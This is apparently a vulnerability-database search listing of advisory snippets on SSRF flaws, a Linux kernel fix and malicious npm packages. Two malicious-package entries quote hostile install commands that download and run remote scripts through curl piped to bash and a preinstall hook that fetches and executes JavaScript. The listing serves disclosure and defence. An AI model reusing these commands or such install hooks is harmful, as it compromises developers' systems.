Lucene search
+L

100 matches found

Cvelist
Cvelist
added 2026/07/10 5:17 p.m.32 views

CVE-2026-55671 ZITADEL: Server-Side Request Forgery (SSRF) and Denylist Bypass in Outgoing HTTP Components

ZITADEL is an open source identity management platform. From 4.0.0-rc.1 through 4.15.1, ZITADEL's HTTP notification channels, OIDC BackChannel Logout, and SAML metadata URL fetches do not consistently validate user-defined URLs against protected denylist handling, allowing server-side requests to...

2.3CVSS0.00252EPSS
Exploits0References3
NVD
NVD
added 2026/07/08 8:16 p.m.6 views

CVE-2026-58501

Zeep is a Python SOAP client. From 4.0.0 before 4.3.3, Settings.forbidexternal is defined but not enforced when parsing WSDL or XSD documents, allowing transitive xsd:import, xsd:include, wsdl:import, and lxml entity or DTD references to fetch attacker-chosen HTTP or HTTPS URLs. This issue is fix...

5.9CVSS0.00252EPSS
Exploits0References3
Positive Technologies
Positive Technologies
added 2026/07/06 12:0 a.m.11 views

PT-2026-56058

Name of the Vulnerable Software and Affected Versions Dragonfly versions prior to v2.4.4-rc.2 Description The scheduler's v1 gRPC service is vulnerable to an unauthenticated Server-Side Request Forgery SSRF. A remote attacker can force the scheduler to make HTTP GET requests to arbitrary internal...

6.9CVSS6.1AI score
Exploits0References13
IBM Security Bulletins
IBM Security Bulletins
added 2026/07/02 7:32 p.m.7 views

Security Bulletin: SSRF Protection Configuration Vulnerability

Summary A configuration vulnerability was identified where SSRF Server-Side Request Forgery protection could be disabled through default settings, potentially allowing authenticated users to make the server fetch arbitrary URLs including cloud metadata endpoints 169.254.169.254, internal services...

7.7CVSS5.8AI score
Exploits0Affected Software1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 4:22 p.m.14 views

Malicious code in @gleamkit/probe (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector aaef237007e5d89031d334bf56a29892c7d6103aba9563b040556eea20ef2cfa No suspicious behaviors were detected in this package. There are no lifecycle scripts performing remote fetches, no credential or environment scrapin...

6.1AI score
Exploits0References2
Positive Technologies
Positive Technologies
added 2026/06/18 12:0 a.m.19 views

PT-2026-50740

Name of the Vulnerable Software and Affected Versions Zitadel versions 4.0.0 through 4.15.1 Zitadel versions 3.0.0 through 3.4.11 Description A Server-Side Request Forgery SSRF issue exists in components that handle outgoing HTTP requests, specifically HTTP Notification Channels, OIDC BackChannel...

2.3CVSS6AI score0.00252EPSS
Exploits0References8
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/17 4:23 a.m.9 views

Malicious code in ts-webplug (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a120eb8e3f6ca34493b7f282544523ab60137e8388148b191f46cda094e50789 The package impersonates the pino logger README titled 'chai-mocks', badges linking to pinojs/pino, module export named pino while its actual package...

6AI score
Exploits0References5
OSV
OSV
added 2026/06/12 3:28 p.m.11 views

MAL-2026-5694 Malicious code in internallib_v856 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d94a6872645a3d5b938f9bc48871dbdff18068bd32d04169c3e421cd6830934a The package's main entry index.js exports a single function command that invokes /bin/bash -c "curl -s http://10.0.0.145:8080/shell.sh | bash || wget...

5.6AI score
Exploits0References2
OSV
OSV
added 2026/06/11 12:38 p.m.12 views

MAL-2026-5645 Malicious code in sn-internal-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...

5.8AI score
Exploits0References3
OSV
OSV
added 2026/06/11 7:24 a.m.13 views

MAL-2026-5604 Malicious code in cache-section-helper (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cad3d2732831e4b798073aff289abd1abdbb718b4caa9e4f970a0dd3f7733653 package.json declares a postinstall hook node -e "require'./loader.js'" that runs automatically on every npm install. loader.js hex-decodes the strin...

5.9AI score
Exploits0References2
OSV
OSV
added 2026/06/11 5:6 a.m.11 views

MAL-2026-5581 Malicious code in webpack-patch (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d0f5ce3525e99528190ba5217a777184e302d46050fc23bef173de6fda240eba Package impersonates the webpack ecosystem but is unrelated to webpack. When the exported middleware is invoked, index.js spawns a detached node...

6.5AI score
Exploits0References5
OSV
OSV
added 2026/05/28 4:16 p.m.9 views

PYSEC-2026-175

PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen which uses Python stdlib's default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no...

4.2CVSS5.9AI score0.00181EPSS
Exploits1References1
NVD
NVD
added 2026/05/28 10:16 a.m.11 views

CVE-2026-46177

In the Linux kernel, the following vulnerability has been resolved: ipmi: Add limits to event and receive message requests The driver would just fetch events and receive messages until the BMC said it was done. To avoid issues with BMCs that never say they are done, add a limit of 10 fetches at a...

7.5CVSS0.00501EPSS
Exploits0References8
ATTACKERKB
ATTACKERKB
added 2026/05/28 9:36 a.m.9 views

CVE-2026-46177

In the Linux kernel, the following vulnerability has been resolved: ipmi: Add limits to event and receive message requests The driver would just fetch events and receive messages until the BMC said it was done. To avoid issues with BMCs that never say they are done, add a limit of 10 fetches at a...

7.5CVSS5.8AI score0.00501EPSS
Exploits0References9Affected Software1
Positive Technologies
Positive Technologies
added 2026/05/28 12:0 a.m.16 views

PT-2026-44396

Name of the Vulnerable Software and Affected Versions PyJWT versions prior to 2.13.0 Description PyJWT is a JSON Web Token implementation in Python. The get signing key function in PyJWKClient forces a new HTTP request to the JWKS endpoint for every JWT containing an unknown kid value, without...

9.8CVSS5.2AI score0.00222EPSS
Exploits0References235
OSV
OSV
added 2026/05/21 9:13 a.m.9 views

MAL-2026-4392 Malicious code in @hanssoft/baileys (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e3f83fb38a98b69c322df069a26c495101aa35682df8f83641b00e2ce40a99bd This package is a fork of the WhatsApp library Baileys whose metadata homepage, repository, author points at the upstream @whiskeysockets/baileys,...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/21 4:36 a.m.12 views

Malicious code in git-userhub (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 859f77ac10aa89722823e0477f8f6986db2b54dd25b1b2aedb05ee31d5891071 Package name 'git-userhub' is a lookalike of a GitHub-related identity, with no legitimate publisher backing. The package.json declares a postinstall...

6.4AI score
Exploits0References2
Cvelist
Cvelist
added 2026/05/19 9:23 a.m.44 views

CVE-2026-46722 XML External Entity Injection in extension "Faceted Search" (ke_search)

The OOXML parsing of the file indexer does not disable external entity resolution. A crafted xlsx or pptx document placed in an indexed directory can cause local files to be read or outbound HTTP requests to be performed, with the retrieved content being written to the search index...

5.9CVSS0.00301EPSS
Exploits0References1
OSV
OSV
added 2026/05/06 10:31 p.m.56 views

GHSA-FHQ3-2GF3-8F3J misp-modules has nsafe remote resource fetching in expansion

An unsafe remote resource fetching vulnerability existed in MISP Modules expansion modules. The htmltomarkdown module accepted arbitrary HTTPS URLs without sufficient validation, which could allow Server-Side Request Forgery against loopback, private, or link-local network resources. Additionally...

5.8CVSS6AI score0.00102EPSS
Exploits0References4
Github Security Blog
Github Security Blog
added 2026/05/01 12:30 p.m.14 views

Apache Neethi doesn't impose any restrictions on URIs when manually fetching remote policy references through the PolicyReference API

Apache Neethi does not impose any restrictions on URIs when manually fetching remote policy references through the PolicyReference API. When an application explicitly calls the API to retrieve a policy from a remote URI, an outbound request is made for arbitrary protocols and internal IP...

7.2CVSS5.9AI score0.00497EPSS
Exploits0References4Affected Software1
Rows per page
Query Builder